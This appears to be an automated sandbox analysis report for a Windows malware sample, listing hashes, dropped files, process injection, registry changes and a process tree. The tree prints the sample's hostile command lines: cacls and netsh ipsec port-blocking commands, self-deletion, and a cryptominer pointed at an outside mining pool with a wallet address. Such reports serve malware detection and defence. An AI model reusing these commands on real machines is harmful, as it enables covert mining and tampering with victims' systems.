Analysis
-
max time kernel
58s -
max time network
149s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
07-05-2021 13:00
Static task
static1
Behavioral task
behavioral1
Sample
tq.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
tq.exe
Resource
win10v20210408
General
-
Target
tq.exe
-
Size
418KB
-
MD5
e8450e61f061fd90d74507eb04845ecd
-
SHA1
f344f20c57f9cb01ea3166f3404336da1519a832
-
SHA256
0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
-
SHA512
d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
MS19.exeMS20.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exewudfhosts.exepid process 1608 MS19.exe 1916 MS20.exe 296 MSSQLH.exe 1016 808 RunDllExe.exe 944 RunDllExe.exe 1600 x64.exe 1928 wudfhosts.exe -
Registers new Print Monitor 2 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\x64.exe upx \Users\Admin\AppData\Local\Temp\x64.exe upx C:\Users\Admin\AppData\Local\Temp\x64.exe upx C:\Users\Admin\AppData\Local\Temp\x64.exe upx C:\Windows\Cursors\wudfhosts.exe upx C:\Windows\Cursors\WUDFhosts.exe upx \Windows\Cursors\WUDFhosts.exe upx -
Loads dropped DLL 10 IoCs
Processes:
tq.exeMSSQLH.exesvchost.exesvchost.exepid process 2000 tq.exe 1168 2000 tq.exe 1960 2000 tq.exe 2000 tq.exe 296 MSSQLH.exe 296 MSSQLH.exe 1932 svchost.exe 1900 svchost.exe -
Drops file in System32 directory 2 IoCs
Processes:
svchost.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Update[1].txt svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
RunDllExe.exeRunDllExe.exesvchost.exedescription pid process target process PID 944 set thread context of 560 944 RunDllExe.exe svchost.exe PID 808 set thread context of 472 808 RunDllExe.exe svchost.exe PID 1932 set thread context of 1900 1932 svchost.exe svchost.exe -
Drops file in Windows directory 18 IoCs
Processes:
x64.exeMSSQLH.exeRunDllExe.exeRunDllExe.exesvchost.exedescription ioc process File created C:\Windows\Cursors\WUDFhosts.exe x64.exe File created C:\Windows\MpMgSvc.dll MSSQLH.exe File created C:\Windows\Logs\RunDllExe_New.dll RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe.dll RunDllExe.exe File created C:\Windows\Logs\RunDllExe_New RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe RunDllExe.exe File opened for modification C:\Windows\Help\active_desktop_render.dll svchost.exe File created C:\Windows\Logs\Vers.txt MSSQLH.exe File created C:\Windows\Logs\RunDllExe_New.dll RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe.dll RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe RunDllExe.exe File created C:\Windows\Logs\RunDllExe_New RunDllExe.exe File created C:\Windows\Help\active_desktop_render.dll x64.exe File created C:\Windows\Help\active_desktop_render_New.dll svchost.exe File created C:\Windows\Logs\RunDllExe.exe MSSQLH.exe File created C:\Windows\Logs\RunDllExe MSSQLH.exe File created C:\Windows\Logs\RunDllExe.dll MSSQLH.exe File opened for modification C:\Windows\Cursors\WUDFhosts.exe x64.exe -
Modifies data under HKEY_USERS 24 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = e08d1b844043d701 svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a070023000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32} svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77 svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = e08d1b844043d701 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\32-e2-17-db-d2-77 svchost.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
MSSQLH.exesvchost.exepid process 296 MSSQLH.exe 1900 svchost.exe 1900 svchost.exe 1900 svchost.exe 1900 svchost.exe 1900 svchost.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
MS20.exeMSSQLH.exesvchost.exewudfhosts.exedescription pid process Token: SeImpersonatePrivilege 1916 MS20.exe Token: SeRestorePrivilege 296 MSSQLH.exe Token: SeBackupPrivilege 296 MSSQLH.exe Token: SeSecurityPrivilege 296 MSSQLH.exe Token: SeTakeOwnershipPrivilege 296 MSSQLH.exe Token: SeRestorePrivilege 296 MSSQLH.exe Token: SeBackupPrivilege 296 MSSQLH.exe Token: SeSecurityPrivilege 296 MSSQLH.exe Token: SeTakeOwnershipPrivilege 296 MSSQLH.exe Token: SeRestorePrivilege 296 MSSQLH.exe Token: SeBackupPrivilege 296 MSSQLH.exe Token: SeSecurityPrivilege 296 MSSQLH.exe Token: SeTakeOwnershipPrivilege 296 MSSQLH.exe Token: SeRestorePrivilege 296 MSSQLH.exe Token: SeBackupPrivilege 296 MSSQLH.exe Token: SeSecurityPrivilege 296 MSSQLH.exe Token: SeTakeOwnershipPrivilege 296 MSSQLH.exe Token: SeRestorePrivilege 296 MSSQLH.exe Token: SeBackupPrivilege 296 MSSQLH.exe Token: SeSecurityPrivilege 296 MSSQLH.exe Token: SeTakeOwnershipPrivilege 296 MSSQLH.exe Token: SeRestorePrivilege 296 MSSQLH.exe Token: SeBackupPrivilege 296 MSSQLH.exe Token: SeSecurityPrivilege 296 MSSQLH.exe Token: SeTakeOwnershipPrivilege 296 MSSQLH.exe Token: SeRestorePrivilege 296 MSSQLH.exe Token: SeBackupPrivilege 296 MSSQLH.exe Token: SeSecurityPrivilege 296 MSSQLH.exe Token: SeTakeOwnershipPrivilege 296 MSSQLH.exe Token: SeRestorePrivilege 1900 svchost.exe Token: SeBackupPrivilege 1900 svchost.exe Token: SeSecurityPrivilege 1900 svchost.exe Token: SeTakeOwnershipPrivilege 1900 svchost.exe Token: SeLockMemoryPrivilege 1928 wudfhosts.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exesvchost.exesvchost.exepid process 2000 tq.exe 296 MSSQLH.exe 808 RunDllExe.exe 944 RunDllExe.exe 1600 x64.exe 1932 svchost.exe 1900 svchost.exe 1900 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tq.exeRunDllExe.exeRunDllExe.exeMSSQLH.exex64.exedescription pid process target process PID 2000 wrote to memory of 1608 2000 tq.exe MS19.exe PID 2000 wrote to memory of 1608 2000 tq.exe MS19.exe PID 2000 wrote to memory of 1608 2000 tq.exe MS19.exe PID 2000 wrote to memory of 1608 2000 tq.exe MS19.exe PID 2000 wrote to memory of 1916 2000 tq.exe MS20.exe PID 2000 wrote to memory of 1916 2000 tq.exe MS20.exe PID 2000 wrote to memory of 1916 2000 tq.exe MS20.exe PID 2000 wrote to memory of 1916 2000 tq.exe MS20.exe PID 2000 wrote to memory of 296 2000 tq.exe MSSQLH.exe PID 2000 wrote to memory of 296 2000 tq.exe MSSQLH.exe PID 2000 wrote to memory of 296 2000 tq.exe MSSQLH.exe PID 2000 wrote to memory of 296 2000 tq.exe MSSQLH.exe PID 808 wrote to memory of 472 808 RunDllExe.exe svchost.exe PID 808 wrote to memory of 472 808 RunDllExe.exe svchost.exe PID 808 wrote to memory of 472 808 RunDllExe.exe svchost.exe PID 808 wrote to memory of 472 808 RunDllExe.exe svchost.exe PID 808 wrote to memory of 472 808 RunDllExe.exe svchost.exe PID 808 wrote to memory of 472 808 RunDllExe.exe svchost.exe PID 944 wrote to memory of 560 944 RunDllExe.exe svchost.exe PID 944 wrote to memory of 560 944 RunDllExe.exe svchost.exe PID 944 wrote to memory of 560 944 RunDllExe.exe svchost.exe PID 944 wrote to memory of 560 944 RunDllExe.exe svchost.exe PID 944 wrote to memory of 560 944 RunDllExe.exe svchost.exe PID 944 wrote to memory of 560 944 RunDllExe.exe svchost.exe PID 296 wrote to memory of 436 296 MSSQLH.exe cacls.exe PID 296 wrote to memory of 436 296 MSSQLH.exe cacls.exe PID 296 wrote to memory of 436 296 MSSQLH.exe cacls.exe PID 296 wrote to memory of 436 296 MSSQLH.exe cacls.exe PID 944 wrote to memory of 560 944 RunDllExe.exe svchost.exe PID 808 wrote to memory of 472 808 RunDllExe.exe svchost.exe PID 808 wrote to memory of 472 808 RunDllExe.exe svchost.exe PID 808 wrote to memory of 472 808 RunDllExe.exe svchost.exe PID 944 wrote to memory of 560 944 RunDllExe.exe svchost.exe PID 944 wrote to memory of 560 944 RunDllExe.exe svchost.exe PID 944 wrote to memory of 560 944 RunDllExe.exe svchost.exe PID 808 wrote to memory of 472 808 RunDllExe.exe svchost.exe PID 296 wrote to memory of 1600 296 MSSQLH.exe x64.exe PID 296 wrote to memory of 1600 296 MSSQLH.exe x64.exe PID 296 wrote to memory of 1600 296 MSSQLH.exe x64.exe PID 296 wrote to memory of 1600 296 MSSQLH.exe x64.exe PID 1600 wrote to memory of 572 1600 x64.exe netsh.exe PID 1600 wrote to memory of 572 1600 x64.exe netsh.exe PID 1600 wrote to memory of 572 1600 x64.exe netsh.exe PID 1600 wrote to memory of 572 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1064 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1064 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1064 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1064 1600 x64.exe netsh.exe PID 1600 wrote to memory of 808 1600 x64.exe netsh.exe PID 1600 wrote to memory of 808 1600 x64.exe netsh.exe PID 1600 wrote to memory of 808 1600 x64.exe netsh.exe PID 1600 wrote to memory of 808 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1452 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1452 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1452 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1452 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1396 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1396 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1396 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1396 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1624 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1624 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1624 1600 x64.exe netsh.exe PID 1600 wrote to memory of 1624 1600 x64.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tq.exe"C:\Users\Admin\AppData\Local\Temp\tq.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MS19.exeC:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\MS20.exeC:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeC:\Users\Admin\AppData\Local\Temp\MSSQLH.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\*.exe /e /d system3⤵
-
C:\Users\Admin\AppData\Local\Temp\x64.exex64.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Filter14⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=FilteraAtion1 action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion14⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Block assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"4⤵
-
C:\Windows\Logs\RunDllExe.exeC:\Windows\Logs\RunDllExe.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
-
C:\Windows\Logs\RunDllExe.exeC:\Windows\Logs\RunDllExe.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\SysWOW64\svchost.exe -k GraphicsPerf_SvcsGroup1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Cursors\wudfhosts.exeC:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MS19.exeMD5
af43611695488fcabec428adc17c47ce
SHA162c98fbc6e57317662369ca7a6bf249ba61e3ba9
SHA25633a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
SHA512a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
-
C:\Users\Admin\AppData\Local\Temp\MS20.exeMD5
262fa5258c0bbd68221eed7226c58cd3
SHA10d8f0d3054f9b7c315bb9dc904258c755c39e379
SHA256b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
SHA512a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeMD5
4f824985f3aa38c89d6ce76e87f3f1c9
SHA18f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
SHA256dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
SHA5121cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
-
C:\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
C:\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
C:\Windows\Cursors\WUDFhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
C:\Windows\Cursors\wudfhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
C:\Windows\Logs\RunDllExeMD5
72e85a6a9f4a9eaa4a5237095385676c
SHA161fc4204ce09d3c4827ba6647fe88cf0701164ff
SHA25673f868b22ca348ce3806f51c48c1f216b03dbcc0266e79958f75d73648b1ae93
SHA512bdf83c534c3f9b6167eb54de252bd8d58ed858448afa17f7fe25d6f8b7e0aa58a4baffed59f9211c9bde93c8aaa051eb79bad8311e972a473b5ce9906ba33319
-
C:\Windows\Logs\RunDllExeMD5
72e85a6a9f4a9eaa4a5237095385676c
SHA161fc4204ce09d3c4827ba6647fe88cf0701164ff
SHA25673f868b22ca348ce3806f51c48c1f216b03dbcc0266e79958f75d73648b1ae93
SHA512bdf83c534c3f9b6167eb54de252bd8d58ed858448afa17f7fe25d6f8b7e0aa58a4baffed59f9211c9bde93c8aaa051eb79bad8311e972a473b5ce9906ba33319
-
C:\Windows\Logs\RunDllExe.dllMD5
98a5b45bf5c2341c8e530785c27c0219
SHA10148cfd9cc24cc5bd3ec8d17387d982cb83eb992
SHA2563335acf02f6cab32a7b4d18517b33412d49b6ad29f167a58561e6711645aade2
SHA5129e0618a01864d032beb60f54f9ae9e2258051f743f28197c33732fc517871f6dcca532e172f7bee62c1db7de5ea6fa8984b933afd878b79eda95870d9daab3d7
-
C:\Windows\Logs\RunDllExe.dllMD5
e91fbd6fe9e6794de7c1552adad7edbc
SHA1b49b7136945978800948b3f9cbe208a5b80020a8
SHA2562cf78dc7d2588d7874dee8a0919ca2d3aab8ac8e54664a0a2c188e099687a33a
SHA51284a6d9df7e4accd3c14650174953fe3a5b5de810d444a31a442a9236486785d492ea5ec0151e63e359ee5c2718243003d7b92a8b9f2544b6bd7cd18ee2f6accc
-
C:\Windows\Logs\RunDllExe.exeMD5
645564cf1c80e047a6e90ac0f2d6a6b7
SHA135e4b5e065b90fe5b1713e5a4645875f023b6a18
SHA2566f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
SHA512e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
-
C:\Windows\Logs\RunDllExe.exeMD5
645564cf1c80e047a6e90ac0f2d6a6b7
SHA135e4b5e065b90fe5b1713e5a4645875f023b6a18
SHA2566f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
SHA512e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
-
\??\c:\windows\help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
\Users\Admin\AppData\Local\Temp\MS19.exeMD5
af43611695488fcabec428adc17c47ce
SHA162c98fbc6e57317662369ca7a6bf249ba61e3ba9
SHA25633a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
SHA512a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
-
\Users\Admin\AppData\Local\Temp\MS19.exeMD5
af43611695488fcabec428adc17c47ce
SHA162c98fbc6e57317662369ca7a6bf249ba61e3ba9
SHA25633a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
SHA512a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
-
\Users\Admin\AppData\Local\Temp\MS20.exeMD5
262fa5258c0bbd68221eed7226c58cd3
SHA10d8f0d3054f9b7c315bb9dc904258c755c39e379
SHA256b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
SHA512a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
-
\Users\Admin\AppData\Local\Temp\MS20.exeMD5
262fa5258c0bbd68221eed7226c58cd3
SHA10d8f0d3054f9b7c315bb9dc904258c755c39e379
SHA256b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
SHA512a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
-
\Users\Admin\AppData\Local\Temp\MSSQLH.exeMD5
4f824985f3aa38c89d6ce76e87f3f1c9
SHA18f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
SHA256dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
SHA5121cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
-
\Users\Admin\AppData\Local\Temp\MSSQLH.exeMD5
4f824985f3aa38c89d6ce76e87f3f1c9
SHA18f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
SHA256dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
SHA5121cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
-
\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
\Windows\Cursors\WUDFhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
\Windows\Help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
\Windows\Logs\RunDllExe.dllMD5
c02d9300deea8aaa42bf5e9c56ddcf29
